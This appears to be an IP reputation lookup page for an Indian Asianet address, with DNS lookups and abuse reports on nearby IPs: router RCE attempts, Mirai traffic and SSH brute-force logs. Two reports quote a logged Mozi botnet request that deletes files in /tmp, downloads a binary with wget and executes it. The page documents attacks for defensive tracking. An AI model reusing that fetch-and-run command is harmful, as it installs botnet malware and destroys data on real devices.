202.83.42.136 - IPInfo

Basic Info

City: Alappuzha

Region: Kerala

Country: India

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
202.83.42.227	attackbotsspam	GPON Home Routers Remote Code Execution Vulnerability CVE 2018-10562, PTR: 227.42.83.202.asianet.co.in.	2020-10-08 03:49:55
202.83.42.202	attackbots	Unwanted checking 80 or 443 port ...	2020-10-07 21:00:15
202.83.42.227	attackspambots	GPON Home Routers Remote Code Execution Vulnerability CVE 2018-10562, PTR: 227.42.83.202.asianet.co.in.	2020-10-07 20:07:19
202.83.42.202	attackbotsspam	Unwanted checking 80 or 443 port ...	2020-10-07 12:45:48
202.83.42.105	attackbots	Tried to find non-existing directory/file on the server	2020-10-06 01:16:40
202.83.42.105	attackbots	Tried to find non-existing directory/file on the server	2020-10-05 17:09:46
202.83.42.68	attackbotsspam	202.83.42.68 - - [29/Sep/2020:21:33:55 +0100] 80 "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 824 "-" "Hello, world" ...	2020-10-01 02:25:56
202.83.42.68	attack	202.83.42.68 - - [29/Sep/2020:21:33:55 +0100] 80 "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 824 "-" "Hello, world" ...	2020-09-30 18:35:00
202.83.42.243	attack	GPON Home Routers Remote Code Execution Vulnerability	2020-09-25 03:09:39
202.83.42.243	attack	GPON Home Routers Remote Code Execution Vulnerability	2020-09-24 18:52:39
202.83.42.132	attackbotsspam	Netgear DGN Device Remote Command Execution Vulnerability	2020-09-21 00:46:17
202.83.42.132	attackbots	Netgear DGN Device Remote Command Execution Vulnerability	2020-09-20 16:41:10
202.83.42.180	attackspambots	Mirai and Reaper Exploitation Traffic	2020-09-16 21:19:50
202.83.42.196	attackspam	Mirai and Reaper Exploitation Traffic	2020-09-16 21:19:28
202.83.42.180	attack	Mirai and Reaper Exploitation Traffic	2020-09-16 13:49:41

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 202.83.42.136
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 61275
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;202.83.42.136.			IN	A

;; AUTHORITY SECTION:
.			546	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020091402 1800 900 604800 86400

;; Query time: 17 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Sep 15 09:03:45 CST 2020
;; MSG SIZE  rcvd: 117

Host info

136.42.83.202.in-addr.arpa domain name pointer 136.42.83.202.asianet.co.in.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
136.42.83.202.in-addr.arpa	name = 136.42.83.202.asianet.co.in.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
81.22.45.73	attack	2019-10-15T06:34:37.271296+02:00 lumpi kernel: [936487.697952] INPUT:DROP:SPAMHAUS_EDROP:IN=eth0 OUT= MAC=52:54:a2:01:a5:04:d2:74:7f:6e:37:e3:08:00 SRC=81.22.45.73 DST=172.31.1.100 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=30277 PROTO=TCP SPT=57637 DPT=390 WINDOW=1024 RES=0x00 SYN URGP=0 ...	2019-10-15 15:22:48
144.217.164.104	attack	Automatic report - Port Scan	2019-10-15 15:43:44
182.252.0.188	attackbotsspam	$f2bV_matches	2019-10-15 15:52:35
220.180.121.6	attackspam	Oct 15 REMOVED dovecot: imap-login: Disconnected $auth failed, 1 attempts in 6 secs$: user=\, method=PLAIN, rip=220.180.121.6, lip=REMOVED, TLS, session=\ Oct 15 REMOVED dovecot: imap-login: Disconnected $auth failed, 1 attempts in 6 secs$: user=\, method=PLAIN, rip=220.180.121.6, lip=REMOVED, TLS, session=\ Oct 15 REMOVED dovecot: imap-login: Disconnected $auth failed, 1 attempts in 5 secs$: user=\, method=PLAIN, rip=220.180.121.6, lip=REMOVED, TLS: Disconnected, session=\	2019-10-15 15:48:15
145.239.73.103	attack	Oct 15 06:34:28 markkoudstaal sshd[27017]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=145.239.73.103 Oct 15 06:34:30 markkoudstaal sshd[27017]: Failed password for invalid user nico from 145.239.73.103 port 40464 ssh2 Oct 15 06:38:27 markkoudstaal sshd[27372]: Failed password for root from 145.239.73.103 port 52200 ssh2	2019-10-15 15:49:25
223.80.100.87	attackspambots	Automatic report - Banned IP Access	2019-10-15 15:44:38
106.13.125.248	attack	$f2bV_matches	2019-10-15 15:49:45
198.1.66.35	attackbots	Scanning and Vuln Attempts	2019-10-15 15:39:35
180.168.141.246	attackbotsspam	Oct 15 06:39:07 work-partkepr sshd\[31210\]: Invalid user csgo from 180.168.141.246 port 54426 Oct 15 06:39:07 work-partkepr sshd\[31210\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=180.168.141.246 ...	2019-10-15 15:45:59
95.58.194.148	attackspam	Oct 15 05:17:52 game-panel sshd[25189]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=95.58.194.148 Oct 15 05:17:54 game-panel sshd[25189]: Failed password for invalid user show from 95.58.194.148 port 37878 ssh2 Oct 15 05:21:47 game-panel sshd[25313]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=95.58.194.148	2019-10-15 15:47:38
134.175.205.46	attack	$f2bV_matches	2019-10-15 15:40:23
83.175.213.250	attackbots	$f2bV_matches	2019-10-15 15:46:29
144.217.13.40	attack	Oct 14 14:42:01 km20725 sshd[4035]: Failed password for r.r from 144.217.13.40 port 60442 ssh2 Oct 14 14:42:01 km20725 sshd[4035]: Received disconnect from 144.217.13.40: 11: Bye Bye [preauth] Oct 14 14:53:45 km20725 sshd[4626]: Failed password for r.r from 144.217.13.40 port 43359 ssh2 Oct 14 14:53:45 km20725 sshd[4626]: Received disconnect from 144.217.13.40: 11: Bye Bye [preauth] Oct 14 14:58:58 km20725 sshd[4941]: Failed password for r.r from 144.217.13.40 port 35954 ssh2 Oct 14 14:58:58 km20725 sshd[4941]: Received disconnect from 144.217.13.40: 11: Bye Bye [preauth] Oct 14 15:03:54 km20725 sshd[5252]: Failed password for r.r from 144.217.13.40 port 56779 ssh2 Oct 14 15:03:54 km20725 sshd[5252]: Received disconnect from 144.217.13.40: 11: Bye Bye [preauth] Oct 14 15:13:37 km20725 sshd[5969]: Failed password for r.r from 144.217.13.40 port 41965 ssh2 Oct 14 15:13:37 km20725 sshd[5969]: Received disconnect from 144.217.13.40: 11: Bye Bye [preauth] Oct 14 15:18:03 km2........ -------------------------------	2019-10-15 15:38:36
217.15.159.18	attackspam	Automatic report - Port Scan Attack	2019-10-15 15:19:19
222.186.175.167	attackspam	2019-10-15T07:49:04.129849abusebot-7.cloudsearch.cf sshd\[28909\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.167 user=root	2019-10-15 15:50:33

Recently Reported IPs

132.46.115.2	52.51.99.222	211.254.128.243	35.79.252.199
79.235.93.250	221.30.12.197	222.230.162.6	208.20.178.241
210.55.152.140	147.139.197.141	90.93.240.162	108.225.211.181
121.187.224.105	173.95.41.245	84.75.208.30	47.36.98.13
107.127.80.204	83.218.50.197	124.199.143.139	39.218.18.135